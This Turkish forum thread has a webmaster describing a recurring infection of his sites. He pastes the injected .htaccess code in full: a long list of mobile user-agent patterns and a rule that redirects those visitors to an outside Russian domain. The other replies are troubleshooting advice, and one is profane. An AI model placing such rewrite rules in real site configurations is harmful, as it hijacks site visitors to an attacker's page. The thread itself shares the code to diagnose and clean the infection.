Sitelere Buşalan Malware Sorunu

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    emuxa
    emuxa's avatar
    Erkek

Selamlar Tam olarak çözemedım sorunu henüz araştırıyorum nerden ve nasıl geldıgını sorun şu .htaccess in içine otomatik olarak boyle bir kod ekliyip mobil siteye yonlendiriyor çözümü bu kodu silmek de nerden bulaştığını henüz bulamadım başkalarında aynı sorun olursa aklınızda bulunsun nerden bulaştıını bulursam yazarım.

virüsün kodları:

RewriteEngine On 

RewriteCond %{HTTP_USER_AGENT} ^1207.*|^3gso.*|^4thp.*|^501i.*|^502i.*|^503i.*|^504i.*|^505i.*|^506i.*|.*Fennec.*|^6310.*|^6590.*|^770s.*|^802s.*|.*a100.*|.*a510.*|.*a511.*|^abac.*|^acer.*|^acoo.*|^acs.*|^aiko.*|^airn.*|.*alacatel.*|^alav.*|^alca.*|^alco.*|^amoi.*|^Amoi.*|.*android.*|^anex.*|^anny.*|^anyw.*|^aptu.*|^arch.*|^argo.*|^aste.*|^asus.*|^ASUS.*|^attw.*|^au.*|^audi.*|^Audiovox.*|^AU-MIC.*|^aur.*|^aus.*|^avan.*|^beck.*|^bell.*|^benq.*|^BenQ.*|^bilb.*|^bird.*|^Bird.*|^blac.*|.*BlackBerry.*|^blaz.*|.*Blazer.*|.*boxee.*|.*BRAVIA.*|^brew.*|^brvw.*|^bumb.*|^bw.*|^c55.*|^capi.*|^ccwa.*|^cdm.*|^CDM.*|.*CE-HTML.*|^cell.*|^chtm.*|^cldc.*|^cmd.*|^comp.*|^cond.*|.*CorePlayer.*|^craw.*|^dait.*|^dall.*|^dang.*|^dbte.*|^dc.*|.*dell\ streak.*|^devi.*|^dica.*|.*DLNA.*|.*DLNADOC.*|^dmob.*|^doco.*|^DoCoMo.*|^dopo.*|^dopod.*|^ds.*|^ds12.*|^el49.*|^elai.*|^eml2.*|^emul.*|^eric.*|.*Ericsson.*|^erk0.*|^esl8.*|^ez40.*|^ez60.*|^ez70.*|^ezos.*|^ezwa.*|^ezze.*|^fake.*|^fetc.*|^fly.*|.*FlyCast.*|.*foobar2000.*|^g1.*|^g560.*|^gene.*|^gf.*|^go.*|.*GomPlayer.*|^good.*|.*GoogleTV.*|^grad.*|^grun.*|^haie.*|^Haier.*|.*hbbtv.*|.*HbbTV.*|^hcit.*|^hd.*|^hei.*|^hipt.*|^hita.*|^HP.*|.*htc.*|^htca.*|^htcg.*|^htcp.*|^htcs.*|^htct.*|^http.*|^huaw.*|.*Huawei.*|^hutc.*|^i230.*|^iac.*|^ibro.*|^idea.*|.*iemobile.*|^ig01.*|^ikom.*|^im1k.*|^i-mobile.*|^inno.*|.*ipad.*|^ipaq.*|.*iPAQ.*|.*iphone.*|.*iPod.*|^iris.*|.*iTunes.*|^jata.*|^java.*|^jbro.*|^jemu.*|^jigs.*|^kddi.*|^KDDI.*|^keji.*|^kgt.*|.*kindle.*|^klon.*|^KONKA.*|^kpt.*|^kwc.*|^KWC.*|^kyoc.*|^kyok.*|.*Large\ Screen.*|^leno.*|^Lenovo.*|^lexi.*|^lg.*|^lg50.*|^lg54.*|^lge.*|^libw.*|^lynx.*|^m3ga.*|^m50.*|^mate.*|^maui.*|^maxo.*|^mc01.*|^mc21.*|^mcca.*|^medi.*|^merc.*|^meri.*|^midp.*|.*midp.*|.*mini.*|^mio8.*|^mioa.*|.*Miro.*|^mits.*|^mmef.*|^mo01.*|^mo02.*|^mobi.*|.*mobile.*|^mode.*|^modo.*|^mot.*|^motv.*|^mozz.*|.*MPlayer.*|.*MSN.*|^mt50.*|^mtp1.*|^mtv.*|^mwbp.*|^mywa.*|^n100.*|^n101.*|^n102.*|^n202.*|^n203.*|^n300.*|^n302.*|^n500.*|^n502.*|^n505.*|^n700.*|^n701.*|^n710.*|^nec.*|^NEC-.*|^nem.*|^neon.*|^netf.*|.*NETTV.*|^newg.*|^NEWGEN.*|^newt.*|.*Nexus\ 10.*|.*Nexus\ 7.*|.*Nintendo.*|^nok6.*|^noki.*|.*Nokia.*|.*Novarra.*|^nzph.*|^o2.*|.*o2.*|.*O2.*|^o2im.*|.*Opera.Mobi.*|^opti.*|^opwv.*|^oran.*|^owg1.*|^p800.*|.*Palm.*|^pana.*|^Panasonic.*|^pand.*|^pant.*|^PANTECH.*|^pdxg.*|^PG.*|^pg13.*|^phil.*|^Philips.*|^pire.*|^play.*|.*PLAYSTATION\ 3.*|.*Plex.*|^pluc.*|^pock.*|.*pocket.*|^port.*|^portalmmm.*|^pose.*|^PPC.*|^prox.*|.*PS3.*|^psio.*|.*psp.*|^qc07.*|^qc12.*|^qc21.*|^qc32.*|^qc60.*|^qci.*|^qtek.*|^Qtek.*|.*QuickTime.*|^qwap.*|^r380.*|^r600.*|^raks.*|^rim9.*|^rove.*|^rozo.*|^s55.*|^sage.*|^Sagem.*|^SAGEM.*|^sama.*|^samm.*|^sams.*|.*SAMSUNG.*|^sany.*|.*Sanyo.*|^sava.*|^sc01.*|^sch.*|^SCH.*|.*SCH-.*|.*sch-i800.*|^scoo.*|^scp.*|^sdk.*|^se47.*|^sec.*|^SEC.*|^sec0.*|^sec1.*|^semc.*|.*SEMC-Browser.*|^send.*|^Sendo.*|^seri.*|^sgh.*|^SGH.*|.*SGH-.*|.*sgh-t849.*|^shar.*|^Sharp.*|.*shw-m180s.*|^sie.*|^SIE.*|^siem.*|^SIEMENS.*|.*silk.*|^sl45.*|^slid.*|^smal.*|^smar.*|.*Smarthub.*|.*smartphone.*|.*SmartTV.*|.*SMART-TV.*|^smb3.*|^smit.*|^smt5.*|^soft.*|^SoftBank.*|^sony.*|^SonyEricsson|^SonyEricsson.*|.*SonyEricsson.*|^sp01.*|^sph.*|^SPH.*|^spv.*|^sy01.*|^symb.*|.*symbian.*|.*SymbianOS.*|^t218.*|^t250.*|^t600.*|^t610.*|^t618.*|.*tablet.*|^tagt.*|^talk.*|^tcl.*|^tdg.*|.*teleca.*|^teli.*|^telm.*|^tim.*|^topl.*|^tosh.*|.*Toshiba.*|.*treo.*|^ts70.*|^tsm.*|^tsm3.*|^tsm5.*|.*up\.browser.*|^upg1.*|.*up\.link.*|.*UPnP.*|^upsi.*|^UTS.*|^utst.*|^v400.*|^v750.*|^veri.*|^Vertu.*|^virg.*|^vite.*|^vk40.*|^vk50.*|^vk52.*|^vk53.*|.*VLC\ media\ player.*|^vm40.*|^voda.*|.*vodafone.*|^vulc.*|^vx52.*|^vx53.*|^vx60.*|^vx61.*|^vx70.*|^vx80.*|^vx81.*|^vx83.*|^vx85.*|^vx98.*|^w3c.*|.*WAFA.*|^wap.*|.*wap.*|^wapa.*|^wapi.*|^wapj.*|^wapm.*|^wapp.*|^wapr.*|^waps.*|^wapt.*|^wapu.*|^wapv.*|^wapy.*|^webc.*|.*webOS.*|.*WebTV.*|^whit.*|.*BOLT.*|^wig.*|.*wii.*|^winc.*|.*windows\ ce.*|.*Windows.CE.*|.*Windows-Media-Player.*|.*WindowsPhone.*|.*Windows\ Phone.*|^winw.*|^wmlb.*|^wonu.*|^x700.*|.*XBMC.*|.*xbox.*|^xda.*|.*Xda.*|^xda2.*|^xdag.*|^yas.*|^your.*|^zeto.*|^ZTE.* [NC,OR]

RewriteCond %{HTTP_ACCEPT} text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml [NC,OR]

RewriteCond %{HTTP:HTTP_X_WAP_PROFILE} .+ [OR]

RewriteCond %{HTTP:HTTP_PROFILE} .+ [OR]

RewriteCond %{HTTP:X-OperaMini-Features} .+ [OR]

RewriteCond %{HTTP:UA-pixels} .+

RewriteRule ^(.*)$ http://m.mobi-avto.ru [L,R=302]

01100101 01101101 01110101 01111000 01100001
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Schwarz
    Schwarz's avatar
    Erkek

bunun kullanım amacının şöyle birşey olduğunu görmüştüm yanlış görmüşte olabilirim , trafik kasan elemanlar eğer kullanıcı telefondan girerse x sitesine , normal pcden girerse y sitesine yönlendirilsin gibi birşeydi.

Ignorance is bliss.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    lepusmorris
    lepusmorris's avatar
    Erkek

hacı virüslü de olsa dosyalarının yedeğini al mutlaka. temizlemek için kurabileceğin antivirüsler dosyalarını da silebilir (ki başıma gelen bir olay). bilgisayarı temizliycen bir şekilde. çünkü ftp programına da bulaşabiliyor bu orospuçocuğu :D onu dışında tek tek temizliycen aga. hosting şirketinden de kaynaklanıyor olabilir. ben hosting şirketimi değiştirmiştim, çözülmüştü ama bok atmış olmayayım yinede. fikir veriyorum sadece.

..
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    emuxa
    emuxa's avatar
    Erkek
    lepusmorris bunu yazdı

hacı virüslü de olsa dosyalarının yedeğini al mutlaka. temizlemek için kurabileceğin antivirüsler dosyalarını da silebilir (ki başıma gelen bir olay). bilgisayarı temizliycen bir şekilde. çünkü ftp programına da bulaşabiliyor bu orospuçocuğu :D onu dışında tek tek temizliycen aga. hosting şirketinden de kaynaklanıyor olabilir. ben hosting şirketimi değiştirmiştim, çözülmüştü ama bok atmış olmayayım yinede. fikir veriyorum sadece.

eyw dedigin tabiki mantıklı zaten onu da ögrenecem komple tüm sitelri yedekliyorum şuanda

01100101 01101101 01110101 01111000 01100001
Toplam Hit: 1878 Toplam Mesaj: 4